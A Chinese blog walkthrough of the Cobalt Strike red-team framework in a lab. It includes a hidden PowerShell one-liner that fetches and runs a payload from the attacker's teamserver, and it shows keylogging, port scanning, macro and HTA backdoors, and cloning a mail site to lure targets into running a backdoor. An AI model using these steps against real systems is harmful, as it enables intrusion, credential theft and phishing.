Cobalt Strike工具基本使用

已于 2023-09-01 18:00:23 修改
阅读量1k 收藏 3
点赞数
分类专栏: 网络安全 文章标签: 网络安全
于 2023-05-25 17:25:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41158271/article/details/130865765
版权

Cobalt Strike

安装

网盘地址:链接:https://pan.baidu.com/s/1GgKaueOjXUz_LPw34GjUWQ
提取码:0dqp

启动

启动server端
sudo ./teamserver 192.168.0.107 123456  # ip + 密码

在这里插入图片描述

启动client

在这里插入图片描述

目标机器连接
  1. 创建监听器
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述

复制内容
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.0.107:8080/a’))”

  1. 受害机执行利用语句

在这里插入图片描述

在这里插入图片描述

工具基使用

用户驱动攻击

屏幕截图

在这里插入图片描述

在这里插入图片描述

进程列表

在这里插入图片描述

键盘记录

  1. 选中需要监听应用后点击log keystrokes
    在这里插入图片描述

  2. 被攻击电脑操作键盘
    在这里插入图片描述

  3. 结束任务

jobs       #查看已有任务
jobkill  id值   #结束某任务

在这里插入图片描述

文件管理

在这里插入图片描述
在这里插入图片描述

远程vnc

查看用户操作页面
在这里插入图片描述

远程代理

在这里插入图片描述
在这里插入图片描述
》》然后本机的浏览器代理可以设置为上面的代理地址,我这没ie浏览器就不进行展示

端口扫描

方法一:使用页面功能直接扫描
在这里插入图片描述
方法二:命令行输入

portscan 192.168.0.109 1-1024,3389,5000-6000 arp 1024

在这里插入图片描述
扫描结果查看
在这里插入图片描述
查看服务情况
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

生成后门

方法一:
在这里插入图片描述
在这里插入图片描述

方法二:
在这里插入图片描述

在这里插入图片描述
wps方式:

新建word文件,开发工具中点击js宏,指定宏名称和宏位置
删除以有内容,复制生成的宏内容到word文件中
另存为带宏的文件
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
》》没办法运行就不展示运行结果了

方法三:
在这里插入图片描述

被攻击者运行后门文件后查看结果

在这里插入图片描述

钓鱼攻击

信息收集

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

被攻击者浏览器运行生成的地址

http://192.168.0.107:80/baidu

在这里插入图片描述
》》不知道什么原因应用信息并没有查询到

网站克隆

已163邮箱为例子

在这里插入图片描述
在这里插入图片描述

文件下载

思路:
让被攻击者访问我们克隆的网站时,诱导目标下载后门文件并运行

  1. 生成后门文件地址
http://192.168.0.107:80/test.hta

在这里插入图片描述
2. 克隆网站

在这里插入图片描述
3. 目标网站浏览器运行地址并下载运行后门文件

使用补充在下篇:https://blog.csdn.net/qq_41158271/article/details/130885781?spm=1001.2014.3001.5501

边缘拼命划水的小陈
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Xsstrike工具安装
qq_34835587的博客
10-19 1398
**XSStrike是一款非常好用的XSS自动检测工具,可以自动检测XSS漏洞并生成payload,它集成了payload生成器,爬虫和模糊引擎功能。 XSStrike不像其他工具那样注入有效负载并检查其工作,而是通过多个解析器分析响应,然后通过与模糊引擎集成的上下文分析来保证有效负载。 除此之外,XSStrike还具有爬行,模糊测试,参数发现,WAF检测功能。它会扫描DOM XSS漏洞。 ****环境:****kali linux python3.6以上版本(该工具只能运行在该版本以上的python环
XSStrike工具的安装及使用
RuoLi_s的博客
01-26 7293
XSStrike是一款检测Cross Site Scripting的高级检测工具。它集成了payload生成器、爬虫和模糊引擎功能。
Cobalt Strike工具基本使用补充
边缘拼命划水的小陈
06-08 176
【代码】Cobalt Strike工具基本使用补充。
CobaltStrike使用教程详解(基础)
逍遥小哥的博客
07-14 1万+
大家好,今天简单来聊聊CobaltStrike,这是我们后渗透阶段必不可少的神器。Cobalt Strike 是一款流行的渗透测试工具,广泛用于红队操作和渗透测试。它由Raphael Mudge创立的Strategic Cyber LLC开发,并于2012年首次发布。Cobalt Strike 提供了一套功能强大的工具和框架,用于模拟网络攻击、横向移动、特权升级、持久化访问以及命令和控制等任务。它旨在帮助安全专业人员评估和改善组织的网络防御能力,同时提供了完整的红队操作平台。
Cobalt Strike入门使用
weixin_42282189的博客
09-03 3991
Cobalt Strike入门使用 作者:h0we777 编者注:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS。 0x01 简介 Cobalt Strike自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟
内网神器cobaltstrike使用教程
zkaqlaoniao的博客
12-15 911
系统环境:需要java环境Oracle Java 1.8,Oracle Java 11下载解压就可以使用首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地服务端启动命令windows运行teamserver.batlinux需要有足够权限,可以通过chmod +x teamserver 来提高权限这里为设定一个服务端,前面为服务端所在机器的ip ,后面为密码启动服务端后,我们就可以启动客户端去连接了。
cobaltstrike 使用教程
qq_52178795的博客
10-11 602
cobaltstrike 使用教程
cobalt strike 4.7
06-07
为了充分利用Cobalt Strike 4.7,使用者需要对网络攻击的生命周期有深入理解,包括侦察、持久化、权限提升、防御规避、凭证访问、横向移动、收集和外联。此外,熟悉相关的操作系统和网络协议知识,以及基本的编程和...
CobaltStrike4.0渗透测试手册
03-18
1. **Cobalt Strike简介**:介绍Cobalt Strike基本概念、功能和用途,包括它的组件如 Beacon、Team Server、Launcher等,以及它们在渗透测试中的角色。 2. **安装与配置**:详细解释如何安装Cobalt Strike 4.0,...
cobaltstrike
01-26
- **cobaltstrike.exe**:这是Cobalt Strike的主要可执行文件,包含了工具的运行时环境。在Windows系统中,.exe文件是程序的入口点,负责启动和运行程序。 - **cobaltstrike.jar**:这是一个Java Archive文件,...
cobaltstrike-linux
01-26
3. 配置Cobalt Strike:首次启动时,Cobalt Strike会引导你完成基本配置,包括服务器设置、团队服务器的连接以及认证密钥的设置。 三、Cobalt Strike的组件与功能 1. Beacon:Beacon是Cobalt Strike的代理程序,...
CobaltStrike逆向学习系列-主线篇
02-22
网络安全领域,CobaltStrike是一款广泛使用的渗透测试工具,尤其在红队操作和安全研究中扮演重要角色。逆向分析CobaltStrike能帮助我们深入理解其工作原理,为二次开发和防御策略提供宝贵资料。本系列文章将详细...
内网渗透工具CobaltStrike使用教程详解
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-31 2万+
内网渗透神奇CobaltStrike工具使用教程,非常适合刚入手的新手,本文讲解了如何启动CobaltStrike,客户端连接团队服务端,配置监听器,生成木马,权限提升,命令执行以及内网横线穿透,插件加载,命令执行等操作,目标信息总结表(自动记忆保存),查看主机的文件和文件夹结构信息,以及利用CobaltStrike进行横向移动等绝大部分的功能,都做了演示和讲解。
Cobalt Strike常用命令
ailx10
10-03 259
一眨眼三个月过去了,2020年Q3季度也结束了,时间过的飞快,但是我成长的还是不够快。趁着十一小长假,来一个小总结。Q1最大的收获:CTF 6个项目全部刷了一遍(ailx10:CTF小白到大白的蜕变)Q2最大的收获:CISSP一刷完成了(ailx10:CISSP注册信息系统安全师(金牌标准))Q3最大的收获:内网安全实验全部做完了(知乎live:内网安全「攻防入门」)Q4季度准备:ALL in S...
Cobalt Strike使用教程一
热门推荐
迷风小白
10-24 7万+
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
pi_heif-0.17.0-pp310-pypy310_pp73-macosx_12_0_x86_64.whl
最新发布
07-27
pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。
mmexport1722080103662.jpg
07-27
mmexport1722080103662.jpg
matlab 20244a 6
07-27
matlab 20244a 6
CobaltStrike渗透测试指南
"CobaltStrike.pdf - 一篇关于Cobalt Strike的详细教程文档,主要涵盖其简介、基本使用、模块介绍、脚本使用和扩展功能,特别提到了Malleable C2和External C2等内容。" Cobalt Strike是一款广泛应用于网络安全领域...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值